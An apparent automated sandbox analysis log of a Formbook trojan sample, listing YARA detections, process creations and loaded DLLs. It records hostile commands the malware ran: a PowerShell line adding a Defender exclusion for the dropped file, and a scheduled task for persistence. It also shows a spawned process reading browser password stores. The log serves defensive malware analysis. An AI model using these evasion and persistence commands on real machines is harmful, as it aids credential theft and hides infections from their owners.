                Source: 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: nK1Y86mbzfbkwpB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: GDhinOc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, TnyEFwUPfADDx05OZ1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, Rwk0pyWBk9DvLIlyWP.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, Rwk0pyWBk9DvLIlyWP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, Rwk0pyWBk9DvLIlyWP.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/12@6/4
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeFile created: C:\Users\user\AppData\Roaming\GDhinOc.exeJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4344:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2704:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeMutant created: \Sessions\1\BaseNamedObjects\FqFZDdiN
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeFile created: C:\Users\user\AppData\Local\Temp\tmp100A.tmpJump to behavior
                Source: nK1Y86mbzfbkwpB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: nK1Y86mbzfbkwpB.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: runas.exe, 00000011.00000002.3352619446.0000000002884000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3352619446.00000000028B1000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2799708468.0000000002884000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2799465764.0000000002862000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3352619446.000000000288E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: nK1Y86mbzfbkwpB.exeReversingLabs: Detection: 52%
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeFile read: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe"
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\GDhinOc.exe C:\Users\user\AppData\Roaming\GDhinOc.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: credui.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: credui.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeSection loaded: mswsock.dllJump to behavior
